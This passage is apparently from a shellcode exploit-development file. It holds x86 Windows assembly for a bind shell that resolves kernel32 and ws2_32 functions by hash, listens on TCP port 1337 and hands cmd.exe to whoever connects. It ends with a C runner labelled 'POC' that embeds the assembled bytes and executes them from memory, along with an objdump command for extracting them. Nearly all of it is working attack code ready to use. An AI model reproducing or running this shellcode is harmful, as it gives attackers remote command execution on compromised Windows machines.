mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next module)
cmp [edi+12*2], cx ; (unicode) module_name[12] == 0x00 / we found kernel32.dll?
jne next_module ; No: try next module
find_function_shorten: ;
jmp find_function_shorten_bnc ; short jump
find_function_ret: ;
pop esi ; ESI = POP return addres
mov [ebp+0x04], esi ; Save find_function address for later usage
jmp resolve_symbols_kernel32 ;
find_function_shorten_bnc: ;
call find_function_ret ; Call fund_function_ret PUSH ret address into the stack
find_function: ;
pushad ; Save all registers
mov eax, [ebx+0x3c] ; Offset of PE signature
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
mov ecx, [edi+0x18] ; NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; AddresOfNames VMA
mov [ebp-4], eax ; Save AddressOfName VMA for later usage
find_function_loop: ;
jecxz find_function_finished ; Jump to the end if ECX is 0
dec ecx ; Decrement our counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
add esi, ebx ; Set ESI to the VMA of the current symbol name
compute_hash: ;
xor eax, eax ; EAX = Null
cdq ; Null EDX
cld ; Clear direction flag
compute_hash_again:
lodsb ; Load the next bytes from ESI into al
test al, al ; Check for Null terminator
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
ror edx, 0x0d ; Rotate edx 13 bits to the right
add edx, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished: ;
find_function_compare:
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
jnz find_function_loop ; If it doesn't match go back to find_function_loop
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get the function RVA
add eax, ebx ; Get the function VMA
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
find_function_finished: ;
popad ; Restore registers
ret ;
resolve_symbols_kernel32: ;
push 0x78b5b983 ; TerminateProcess hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x10], eax ; Save TerminateProcess address for later usage
push 0xec0e4e8e ; LoadLibraryA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x14], eax ; Save LoadLibraryA address for later usage
push 0x16b3fe72 ; CreateProcessA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x18], eax ; Save CreateProcessA address for later usage
load_ws2_32: ;
xor eax, eax ; EAX = Null
mov ax, 0x6c6c ; EAX = 0x6c6c
push eax ; ESP = "ll"
push dword 0x642e3233 ; ESP = "32.dll"
push dword 0x5f327377 ; ESP = "ws2_32.dll"
push esp ; ESP = &("ws2_32.dll")
call dword [ebp+0x14] ; Call LoadLibraryA
resolve_symbols_ws2_32:
mov ebx, eax ; Move the base address of ws2_32.dll to EBX
push 0x3bfcedcb ; WSAStartup hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x1C], eax ; Save WSAStartup address for later usage
push 0xadf509d9 ; WSASocketA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x20], eax ; Save WSASocketA address for later usage
push 0xc7701aa4 ; Bind hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x24], eax ; Save Bind address for later usage
push 0xe92eada4 ; listen hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x28], eax ; Save listen address for later usage
push 0x9f5b7976 ; WSAGetLastError hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x32], eax ; Save WSAGetLastError address for later usage
push 0x498649e5 ; accept hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x36], eax ; Save acccept address for later usage
call_wsastartup: ;
mov eax, esp ; Move ESP to EAX
mov cx, 0x590 ; Move 0x590 to CX
sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
push eax ; Push lpWSAData
xor eax, eax ; EAX = Null
mov ax, 0x0202 ; Move version to AX
push eax ; Push wVersionRequired (0x00000202)
call dword [ebp+0x1C] ; Call WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)
call_wsasocketa: ; WSASocketA(AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL )
xor eax, eax ; EAX = Null
push eax ; Push dwFlags
push eax ; Push g
push eax ; Push lpProtocolInfo
mov al, 0x06 ; Move AL, IPPROTO_TCP
push eax ; Push protocol
sub al, 0x05 ; Substract 0x05 from AL, AL = 0x01
push eax ; Push type
inc eax ; Increase EAX, EAX = 0x02
push eax ; Push af
call dword [ebp+0x20] ; Call WSASocketA(2,1,6,0,0,0)
create_sockaddr_in_struct: ; sockaddr_in {AF_INET = 2; p1337 = 0x3905; INADDR_ANY = 0x5D00A8C0}
mov esi, eax ; Move the SOCKET descriptor to ESI
xor eax, eax ; EAX = Null
push eax ; Push sin_addr (any address 0.0.0.0)
mov ax, 0x3905 ; Move the sin_port (example: 1337) to AX (EAX = 0x00003905)
shl eax, 0x10 ; Left shift EAX by 0x10 bytes (EAX = 0x39050000)
add ax, 0x02 ; Add 0x02 (AF_INET) to AX
push eax ; Push sin_port & sin_family
push esp ; Push pointer to the sockaddr_in structure
pop edi ; EDI = &(sockaddr_in)
call_bind: ; bind(SOCKET *s = ESI, const sockaddr *addr = EDI, int namelen = 0x16)
xor eax, eax ; EAX = Null
add al, 0x16 ; Set AL to 0x16
push eax ; Push namelen
push edi ; Push *addr
push esi ; Push s
call dword [ebp+0x24] ; Call bind
call_wsagetlaserror: ; WSAGetLastError() (just for debugging purpouse)
call dword [ebp+0x32] ; Call WSAGetLastError
call_listen: ;
xor eax, eax ; EAX = Null
push eax ; Push backlog
push esi ; Push s
call dword [ebp+0x28] ; Call WS2_32!listen
call_accept: ; accept( SOCKET s, sockaddr *addr, int *addrlen)
xor eax, eax ; EAX = Null
push eax ; Push *addrlen (optional)
push eax ; Push *addr (optional)
push esi ; Push socket HANDLE from WSASocketA()
call dword [ebp+0x36] ; Call accept(SOCKET s ,Null, Null)
create_startupinfoa: ;
mov esi, eax ; Save Handle returned from accept() into ESI
push esi ; Push hStdError
push esi ; Push hStdOutput
push esi ; Push hStdInput
xor eax, eax ; EAX = Null
push eax ; Push lpReserved2
push eax ; Push cbReserved2 & wShowWindow
mov al, 0x80 ; Move 0x80 to AL
xor ecx, ecx ; EAX = Null
mov cl, 0x80 ; Move 0x80 to CL
add eax, ecx ; Set EAX to 0x100
push eax ; Push dwFlags
xor eax, eax ; EAX = Null
push eax ; Push dwFillAttribute
push eax ; Push dwYCountChars
push eax ; Push dwXCountChars
push eax ; Push dwYSize
push eax ; Push dwXSize
push eax ; Push dwY
push eax ; Push dwX
push eax ; Push lpTitle
push eax ; Push lpDesktop
push eax ; Push lpReserved
mov al, 0x44 ; Move 0x44 to AL
push eax ; Push cb
push esp ; Push pointer to the STARTUPINFOA structure
pop edi ; Store pointer to STARTUPINFOA in EDI
create_cmd_string: ;
mov eax, 0xff9a879b ; Move 0xff9a879b into EAX
neg eax ; Negate EAX, EAX = 00657865
push eax ; Push part of the "cmd.exe" string
push 0x2e646d63 ; Push the remainder of the "cmd.exe" string
push esp ; Push pointer to the "cmd.exe" string
pop ebx ; Store pointer to the "cmd.exe" string in EBX
call_createprocessa: ;
mov eax, esp ; Move ESP to EAX
xor ecx, ecx ; ECX = Null
mov cx, 0x390 ; Move 0x390 to CX
sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
push eax ; Push lpProcessInformation
push edi ; Push lpStartupInfo
xor eax, eax ; EAX = Null
push eax ; Push lpCurrentDirectory
push eax ; Push lpEnvironment
push eax ; Push dwCreationFlags
inc eax ; Increase EAX, EAX = 0x01 (TRUE)
push eax ; Push bInheritHandles
dec eax ; EAX = Null
push eax ; Push lpThreadAttributes
push eax ; Push lpProcessAttributes
push ebx ; Push lpCommandLine
push eax ; Push lpApplicationName
call dword [ebp+0x18] ; Call CreateProcessA
call_terminate_process: ;
xor eax, eax ; EAX = Null
push eax ; uExitCode
push 0xffffffff ; HANDLE hProcess
call dword [ebp+0x04] ; Call TerminateProcess
[*]================================= POC =============================== [*]
/*
Shellcode runner author: reenz0h (twitter: @sektor7net)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// nasm -f win32 shellcode.asm -o shellcode.o
// objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
unsigned char payload[] =
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b"
"\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06"
"\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03"
"\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b"
"\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca"
"\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b"
"\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3"
"\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x10\x68\x8e\x4e\x0e\xec\xff\x55"
"\x04\x89\x45\x14\x68\x72\xfe\xb3\x16\xff\x55\x04\x89\x45\x18\x31\xc0\x66"
"\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x55\x14"
"\x89\xc3\x68\xcb\xed\xfc\x3b\xff\x55\x04\x89\x45\x1c\x68\xd9\x09\xf5\xad"
"\xff\x55\x04\x89\x45\x20\x68\xa4\x1a\x70\xc7\xff\x55\x04\x89\x45\x24\x68"
"\xa4\xad\x2e\xe9\xff\x55\x04\x89\x45\x28\x68\x76\x79\x5b\x9f\xff\x55\x04"
"\x89\x45\x32\x68\xe5\x49\x86\x49\xff\x55\x04\x89\x45\x36\x89\xe0\x66\xb9"
"\x90\x05\x29\xc8\x50\x31\xc0\x66\xb8\x02\x02\x50\xff\x55\x1c\x31\xc0\x50"
"\x50\x50\xb0\x06\x50\x2c\x05\x50\x40\x50\xff\x55\x20\x89\xc6\x31\xc0\x50"
"\x66\xb8\x05\x39\xc1\xe0\x10\x66\x83\xc0\x02\x50\x54\x5f\x31\xc0\x04\x16"
"\x50\x57\x56\xff\x55\x24\xff\x55\x32\x31\xc0\x50\x56\xff\x55\x28\x31\xc0"
"\x50\x50\x56\xff\x55\x36\x89\xc6\x56\x56\x56\x31\xc0\x50\x50\xb0\x80\x31"
"\xc9\xb1\x80\x01\xc8\x50\x31\xc0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50"
"\xb0\x44\x50\x54\x5f\xb8\x9b\x87\x9a\xff\xf7\xd8\x50\x68\x63\x6d\x64\x2e"
"\x54\x5b\x89\xe0\x31\xc9\x66\xb9\x90\x03\x29\xc8\x50\x57\x31\xc0\x50\x50"
"\x50\x40\x50\x48\x50\x50\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55"
"\x04";
unsigned int payload_len = 415;
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec_mem, payload, payload_len);
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("Shellcode Length: %d\n", strlen(payload));
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}